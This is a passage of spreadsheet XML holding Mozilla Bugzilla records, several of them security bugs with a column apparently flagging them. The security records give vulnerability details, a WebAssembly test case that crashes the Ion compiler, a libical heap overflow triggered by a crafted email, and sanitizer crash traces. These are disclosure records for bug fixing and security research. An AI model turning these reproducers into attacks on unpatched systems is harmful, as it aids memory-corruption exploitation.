  mallocs by size class: 8:259684; 9:42719; 10:11536; 11:21111; 12:2363; 13:1984; 14:1570; 15:454; 16:896; 17:1423; 18:70; 19:42; 20:22; 21:2;
  frees   by size class: 8:141180; 9:31851; 10:8122; 11:19392; 12:1538; 13:1339; 14:1380; 15:326; 16:744; 17:1401; 18:61; 19:38; 20:21; 21:1;
  rfrees  by size class: 8:110450; 9:17331; 10:5579; 11:13200; 12:779; 13:636; 14:452; 15:202; 16:531; 17:248; 18:29; 19:3; 20:1; 21:1;
Stats: malloc large: 1559 small slow: 2115
==3779== ABORTING</t>
        </is>
      </c>
      <c r="X3055" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3056">
      <c r="A3056" t="n">
        <v>1739683</v>
      </c>
      <c r="B3056" t="inlineStr">
        <is>
          <t>2021-11-05 11:52:36 -0700</t>
        </is>
      </c>
      <c r="C3056" t="inlineStr">
        <is>
          <t>Crash in Wasm Ion code when gczeal is used with reference types and builtin instance method calls</t>
        </is>
      </c>
      <c r="D3056" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:31 -0700</t>
        </is>
      </c>
      <c r="E3056" t="n">
        <v>1</v>
      </c>
      <c r="F3056" t="n">
        <v>1</v>
      </c>
      <c r="G3056" t="n">
        <v>3</v>
      </c>
      <c r="H3056" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3056" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3056" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K3056" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3056" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3056" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3056" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3056" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3056" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main95+][adv-ESR91.4.0+]</t>
        </is>
      </c>
      <c r="Q3056" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3056" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3056" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T3056" t="n">
        <v>1</v>
      </c>
      <c r="U3056" t="n">
        <v>0</v>
      </c>
      <c r="V3056" t="n">
        <v>28</v>
      </c>
      <c r="W3056" t="inlineStr">
        <is>
          <t>The following Wasm jit-test test case triggers a crash in Ion:
```
// crash.js
gczeal(2, 1); // Collect on every allocation.
let exports = wasmEvalText(
  `(module
     (table $tab (export "tab") 5 externref)
     (elem declare funcref (ref.func $g))
     (func $g)
     (func $f (export "f") (param externref) (result)
       (ref.func $g) ;; force a collection via allocation in instance call
                     ;; stack map is not at the right offset as failure mode is FailOnInvalidRef
       (ref.is_null)
       (if
         (then)
         ;; crashes here due to GC happening above
         ;; at this point the externref on stack is a poisoned value
         (else (i32.const 0) (local.get 0) (table.set $tab)))
       )
     )`,
  {}
).exports;
exports.f("foo");
```
Running this produces a crash like the following
```
$ mach jit-test --ion crash.js
Assertion failure: ThreadId::ThisThreadId() == owningThread_, at /home/asumu/mozilla-unified/js/src/threading/Mutex.cpp:63                                                                   
UndefinedBehaviorSanitizer:DEADLYSIGNAL                                                                                                                                                      
==28940==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557b685d175c bp 0x7ffec0503ba0 sp 0x7ffec0503b70 T28940)                                            
==28940==The signal is caused by a WRITE memory access.                                                                                                                                      
==28940==Hint: address points to the zero page.     
```
This is reduced from another test case (in exception handling Ion code) where it was more obvious that the `externref` parameter to the function `$f` is getting collected and overwritten with a poisoned value, but you can see in gdb that the externref is overwritten with `0x2F` (`JS_FRESH_NURSERY_PATTERN`) if you break in the `tableSet` method.
What appears to be happening is that stack maps for Ion calls to Wasm instance method calls are not being installed correctly (at the right offset), so they are not actually looked up during GC. The GC then misses roots in the stack frame. This happens on methods where the failure mode is not `Infallible`, as there are some error handling instructions inserted between the call return point and the location of the `LSafepoint`.
I'll attach a patch that should fix the offsets later.
I think it is difficult to trigger this bug without gczeal turned on, but I've marked this as a security bug just in case.</t>
        </is>
      </c>
      <c r="X3056" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3057">
      <c r="A3057" t="n">
        <v>639774</v>
      </c>
      <c r="B3057" t="inlineStr">
        <is>
          <t>2011-03-08 02:23:21 -0800</t>
        </is>
      </c>
      <c r="C3057" t="inlineStr">
        <is>
          <t>Articles that have not been reviewed are shown as up to date in the localization dashboard</t>
        </is>
      </c>
      <c r="D3057" t="inlineStr">
        <is>
          <t>2011-03-24 08:31:00 -0700</t>
        </is>
      </c>
      <c r="E3057" t="n">
        <v>1</v>
      </c>
      <c r="F3057" t="n">
        <v>1</v>
      </c>
      <c r="G3057" t="n">
        <v>5</v>
      </c>
      <c r="H3057" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3057" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3057" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3057" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3057" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3057" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3057" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3057" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3057" t="inlineStr"/>
      <c r="Q3057" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3057" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3057" t="inlineStr">
        <is>
          <t>2.7</t>
        </is>
      </c>
      <c r="T3057" t="n">
        <v>1</v>
      </c>
      <c r="U3057" t="n">
        <v>0</v>
      </c>
      <c r="V3057" t="n">
        <v>3</v>
      </c>
      <c r="W3057" t="inlineStr">
        <is>
          <t>Articles that have not been reviewed are shown as up to date in the localization dashboard, even if there was a newer edit of the English article. Case in point:
https://support.mozilla.com/es/kb/Marcadores
See how it is displayed on the Spanish dashboard:
https://support.mozilla.com/es/localization/most-visited-translations
Unreviewed articles should show up as not yet translated articles in the dashboard</t>
        </is>
      </c>
      <c r="X3057" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3058">
      <c r="A3058" t="n">
        <v>1553814</v>
      </c>
      <c r="B3058" t="inlineStr">
        <is>
          <t>2019-05-23 06:16:38 -0700</t>
        </is>
      </c>
      <c r="C3058" t="inlineStr">
        <is>
          <t>Heap buffer overflow in icalvalue.c icalmemory_strdup_and_dequote</t>
        </is>
      </c>
      <c r="D3058" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:40 -0700</t>
        </is>
      </c>
      <c r="E3058" t="n">
        <v>1</v>
      </c>
      <c r="F3058" t="n">
        <v>1</v>
      </c>
      <c r="G3058" t="n">
        <v>2</v>
      </c>
      <c r="H3058" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3058" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J3058" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3058" t="inlineStr">
        <is>
          <t>Lightning 6.2</t>
        </is>
      </c>
      <c r="L3058" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3058" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3058" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3058" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3058" t="inlineStr">
        <is>
          <t>[default disclosure date June 23]</t>
        </is>
      </c>
      <c r="Q3058" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3058" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3058" t="inlineStr">
        <is>
          <t>6.2.7</t>
        </is>
      </c>
      <c r="T3058" t="n">
        <v>1</v>
      </c>
      <c r="U3058" t="n">
        <v>0</v>
      </c>
      <c r="V3058" t="n">
        <v>21</v>
      </c>
      <c r="W3058" t="inlineStr">
        <is>
          <t>Created attachment 9067028
heap-corruption-submit.eml
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Steps to reproduce:
Open the attached saved message (heap-corruption-submit.eml) in Thunderbird. Receiving this message in my inbox also triggers the bug without further user interaction. The thunderbird process is killed.
Triggering the bug might require several attempts, due to differences in the heap state. See crash reports attached.
Actual results:
This bug manifests with several effects, including out of bounds read, write, null pointer dereference and heap corruption, depending on the heap state at the moment of the overflow.
The vulnerable function icalmemory_strdup_and_dequote() lacks proper bounds checking while looping through an input buffer, which can be controlled by a remote user. When an unexpected input is provided, the loops goes out of bound causing out of bounds reads in the input buffer and out of bounds writes to a heap allocated buffer.
$ gdb --args thunderbird heap-corruption-submit.eml
[...]
Thread 1 "thunderbird" received signal SIGSEGV, Segmentation fault.
0x0000555555561cae in malloc ()
Reports for read, write, nullptr deref and heap corruption:
==2337==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62d000009b84 at pc 0x00000053619f bp 0x7fff694798b0 sp 0x7fff694798a8
READ of size 1 at 0x62d000009b84 thread T0
    #0 0x53619e in icalmemory_strdup_and_dequote /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:202:19
    #1 0x5355c2 in icalvalue_new_from_string_with_error /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:546:27
    #2 0x519251 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1075:14
    #3 0x517e1b in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #4 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #5 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #6 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #7 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #8 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #9 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #10 0x7f2c4823bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41dc49 in _start (/opt/libfuzzer/thunderbird_libical_fuzzer+0x41dc49)
0x62d000009b84 is located 0 bytes to the right of 38788-byte region [0x62d000000400,0x62d000009b84)
allocated by thread T0 here:
    #0 0x4cbb5d in malloc (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4cbb5d)
    #1 0x4fe7bd in icalmemory_new_buffer /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalmemory.c:266:15
    #2 0x516f03 in make_segment /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:224:11
    #3 0x519195 in icalparser_get_value /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:327:11
    #4 0x519195 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1058
    #5 0x517e1b in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #6 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #7 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #8 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #9 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #10 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #11 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #12 0x7f2c4823bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:202:19 in icalmemory_strdup_and_dequote
------------
==2357==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000206 at pc 0x000000536197 bp 0x7ffc511418b0 sp 0x7ffc511418a8
WRITE of size 1 at 0x603000000206 thread T0
    #0 0x536196 in icalmemory_strdup_and_dequote /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c
    #1 0x5355c2 in icalvalue_new_from_string_with_error /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:546:27
    #2 0x519251 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1075:14
    #3 0x517e1b in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #4 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #5 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #6 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #7 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #8 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #9 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #10 0x7fc553950b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #11 0x41dc49 in _start (/opt/libfuzzer/thunderbird_libical_fuzzer+0x41dc49)
0x603000000206 is located 0 bytes to the right of 22-byte region [0x6030000001f0,0x603000000206)
allocated by thread T0 here:
    #0 0x4cbb5d in malloc (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4cbb5d)
    #1 0x535eae in icalmemory_strdup_and_dequote /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:193:24
    #2 0x5355c2 in icalvalue_new_from_string_with_error /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c:546:27
    #3 0x519251 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1075:14
    #4 0x517e1b in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #5 0x4fd243 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #6 0x4fa975 in LLVMFuzzerTestOneInput (/opt/libfuzzer/thunderbird_libical_fuzzer+0x4fa975)
    #7 0x43a681 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x43a681)
    #8 0x424327 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x424327)
    #9 0x42a4c1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer/thunderbird_libical_fuzzer+0x42a4c1)
    #10 0x453f62 in main (/opt/libfuzzer/thunderbird_libical_fuzzer+0x453f62)
    #11 0x7fc553950b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalvalue.c in icalmemory_strdup_and_dequote
--------
==10900==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fa1b13fbd45 bp 0x7fff1c4e7ec0 sp 0x7fff1c4e7368 T10900)
--------
thunderbird_libical_fuzzer: malloc.c:2401: sysmalloc: Assertion `(old_top == initial_top (av) &amp;&amp; old_size == 0) || ((unsigned long) (old_size) &gt;= MINSIZE &amp;&amp; prev_inuse (old_top) &amp;&amp; ((unsigned long) old_end &amp; (pagesize - 1)) == 0)' failed.
==10928== ERROR: libFuzzer: deadly signal
    #0 0x45c5b0 in __sanitizer_print_stack_trace (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x45c5b0)
    #1 0x43c61b in fuzzer::PrintStackTrace() (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x43c61b)
    #2 0x422083 in fuzzer::Fuzzer::CrashCallback() (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x422083)
    #3 0x7f0d4197f88f  (/lib/x86_64-linux-gnu/libpthread.so.0+0x1288f)
    #4 0x7f0d40bf8e96 in __libc_signal_restore_set /build/glibc-OTsEL5/glibc-2.27/signal/../sysdeps/unix/sysv/linux/nptl-signals.h:80
    #5 0x7f0d40bf8e96 in raise /build/glibc-OTsEL5/glibc-2.27/signal/../sysdeps/unix/sysv/linux/raise.c:48
    #6 0x7f0d40bfa800 in abort /build/glibc-OTsEL5/glibc-2.27/stdlib/abort.c:79
    #7 0x7f0d40c4da90 in __malloc_assert /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:298
    #8 0x7f0d40c4da90 in sysmalloc /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:2398
    #9 0x7f0d40c4efef in _int_malloc /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:4125
    #10 0x7f0d40c512ec in malloc /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:3065
    #11 0x479131 in pvl_new_element /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/pvl.c:118:36
    #12 0x47930f in pvl_push /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/pvl.c:194:28
    #13 0x46c7e7 in icalproperty_add_parameters /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalproperty.c:87:6
    #14 0x48c215 in icalproperty_vanew_xlicerror /opt/src/thunderbird-60.6.1/obj-x86_64-pc-linux-gnu/comm/calendar/libical/src/libical/icalderivedproperty.c:3214:4
    #15 0x46b240 in insert_error /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:584:3
    #16 0x46ae75 in icalparser_add_line /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:883:3
    #17 0x46a3fd in icalparser_parse /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:623:11
    #18 0x45de8a in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1236:9
    #19 0x45c8f4 in LLVMFuzzerTestOneInput (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x45c8f4)
    #20 0x4235a1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x4235a1)
    #21 0x40d247 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x40d247)
    #22 0x4133e1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x4133e1)
    #23 0x43ce82 in main (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x43ce82)
    #24 0x7f0d40bdbb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #25 0x406b69 in _start (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x406b69)
--------
free(): invalid next size (fast)
==10502== ERROR: libFuzzer: deadly signal
    #0 0x45c5b0 in __sanitizer_print_stack_trace (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x45c5b0)
    #1 0x43c61b in fuzzer::PrintStackTrace() (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x43c61b)
    #2 0x422083 in fuzzer::Fuzzer::CrashCallback() (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x422083)
    #3 0x7f40bfdd888f  (/lib/x86_64-linux-gnu/libpthread.so.0+0x1288f)
    #4 0x7f40bf051e96 in __libc_signal_restore_set /build/glibc-OTsEL5/glibc-2.27/signal/../sysdeps/unix/sysv/linux/nptl-signals.h:80
    #5 0x7f40bf051e96 in raise /build/glibc-OTsEL5/glibc-2.27/signal/../sysdeps/unix/sysv/linux/raise.c:48
    #6 0x7f40bf053800 in abort /build/glibc-OTsEL5/glibc-2.27/stdlib/abort.c:79
    #7 0x7f40bf09c896 in __libc_message /build/glibc-OTsEL5/glibc-2.27/libio/../sysdeps/posix/libc_fatal.c:181
    #8 0x7f40bf0a3909 in malloc_printerr /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:5350
    #9 0x7f40bf0aaf5f in _int_free /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:4213
    #10 0x7f40bf0aaf5f in free /build/glibc-OTsEL5/glibc-2.27/malloc/malloc.c:3124
    #11 0x45e3f9 in icalproperty_free /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalproperty.c:253:2
    #12 0x45e224 in icalcomponent_free /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalcomponent.c:262:6
    #13 0x469d5b in icalparser_free /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:170:2
    #14 0x45def4 in icalparser_parse_string /opt/src/thunderbird-60.6.1/comm/calendar/libical/src/libical/icalparser.c:1240:5
    #15 0x45c8f4 in LLVMFuzzerTestOneInput (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x45c8f4)
    #16 0x4235a1 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x4235a1)
    #17 0x40d247 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x40d247)
    #18 0x4133e1 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x4133e1)
    #19 0x43ce82 in main (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x43ce82)
    #20 0x7f40bf034b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #21 0x406b69 in _start (/opt/libfuzzer-noasan/thunderbird_libical_fuzzer+0x406b69)
Expected results:
No heap overflow nor corruption.
When the vulnerable function in Thunderbird is replaced with current implementation in libical upstream (https://github.com/libical/libical/blob/master/src/libical/icalvalue.c#L170) this bug doesn't manifest anymore.</t>
        </is>
      </c>
      <c r="X3058" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3059">
      <c r="A3059" t="n">
        <v>589083</v>
      </c>
      <c r="B3059" t="inlineStr">
        <is>
          <t>2010-08-20 00:57:13 -0700</t>
        </is>
      </c>
      <c r="C3059" t="inlineStr">
        <is>
          <t>Linux 64 bit builders need a working python sqlite3 module</t>
        </is>
      </c>
      <c r="D3059" t="inlineStr">
        <is>
          <t>2010-08-20 09:06:32 -0700</t>
        </is>
      </c>
      <c r="E3059" t="n">
        <v>1</v>
      </c>
      <c r="F3059" t="n">
        <v>1</v>
      </c>
      <c r="G3059" t="n">
        <v>6</v>
      </c>
      <c r="H3059" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3059" t="inlineStr">
        <is>
          <t>Mozilla Messaging Graveyard</t>
        </is>
      </c>
      <c r="J3059" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K3059" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3059" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3059" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3059" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3059" t="inlineStr"/>
      <c r="Q3059" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3059" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3059" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3059" t="n">
        <v>1</v>
      </c>
      <c r="U3059" t="n">
        <v>0</v>
      </c>
      <c r="V3059" t="n">
        <v>2</v>
      </c>
      <c r="W3059" t="inlineStr">
        <is>
          <t>This changeset:
http://hg.mozilla.org/mozilla-central/rev/dee01181500d 
added "import sqlite3" onto the list of imports. On at least momo-linux64-05 and -02 we're getting:
/tools/python/bin/python2.5 -u /buildbot/comm-central-trunk-bloat-linux64/build/mozilla/config/pythonpath.py \
        -I./mozilla/dist/../build -I/buildbot/comm-central-trunk-bloat-linux64/build/mozilla/build \
        /buildbot/comm-central-trunk-bloat-linux64/build/mailnews/test/performance/bloat/runtest.py \
	--distdir=./mozilla/dist --bin=thunderbird --brand=ShredderDebug \
	--symbols-path=./mozilla/dist/crashreporter-symbols 
Traceback (most recent call last):
  File "/buildbot/comm-central-trunk-bloat-linux64/build/mozilla/config/pythonpath.py", line 40, in &lt;module&gt;
    execfile(script, {'__name__': '__main__', '__file__': script})
  File "/buildbot/comm-central-trunk-bloat-linux64/build/mailnews/test/performance/bloat/runtest.py", line 48, in &lt;module&gt;
    from automation import Automation
  File "./mozilla/dist/../build/automation.py", line 16, in &lt;module&gt;
    import sqlite3
  File "/tools/python/lib/python2.5/sqlite3/__init__.py", line 24, in &lt;module&gt;
    from dbapi2 import *
  File "/tools/python/lib/python2.5/sqlite3/dbapi2.py", line 27, in &lt;module&gt;
    from _sqlite3 import *
ImportError: libsqlite3.so.0: cannot open shared object file: No such file or directory
make: *** [mailbloat] Error 1
Until we've fixed this I've hidden the linux64 bit boxes on tinderbox; we can survive without them for a bit. See here for the non-hidden version:
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Thunderbird&amp;noignore=1</t>
        </is>
      </c>
      <c r="X3059" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3060">
      <c r="A3060" t="n">
        <v>1243178</v>
      </c>
      <c r="B3060" t="inlineStr">
        <is>
          <t>2016-01-26 14:19:59 -0800</t>
        </is>
      </c>
      <c r="C3060" t="inlineStr">
        <is>
          <t>CSP's report-uri (over-)writes files</t>
        </is>
      </c>
      <c r="D3060" t="inlineStr">
        <is>
          <t>2024-05-30 09:08:40 -0700</t>
        </is>
      </c>
      <c r="E3060" t="n">
        <v>1</v>
      </c>
      <c r="F3060" t="n">
        <v>1</v>
      </c>
      <c r="G3060" t="n">
        <v>3</v>
      </c>
      <c r="H3060" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3060" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3060" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3060" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3060" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3060" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3060" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3060" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3060" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3060" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3060" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3060" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T3060" t="n">
        <v>1</v>
      </c>
      <c r="U3060" t="n">
        <v>0</v>
      </c>
      <c r="V3060" t="n">
        <v>24</v>
      </c>
      <c r="W3060" t="inlineStr">
        <is>
          <t>Firefox can be forced to (over-)write files on the user's host when prompted to report policy violations to a file:///, resource:// or chrome:// URL. While the last two are tricky to exploit since they most likely require vulnerable add-ons, the first is dead simple. The attacker does not have full control of the report, but can control multiple values inside of the report JSON structure.
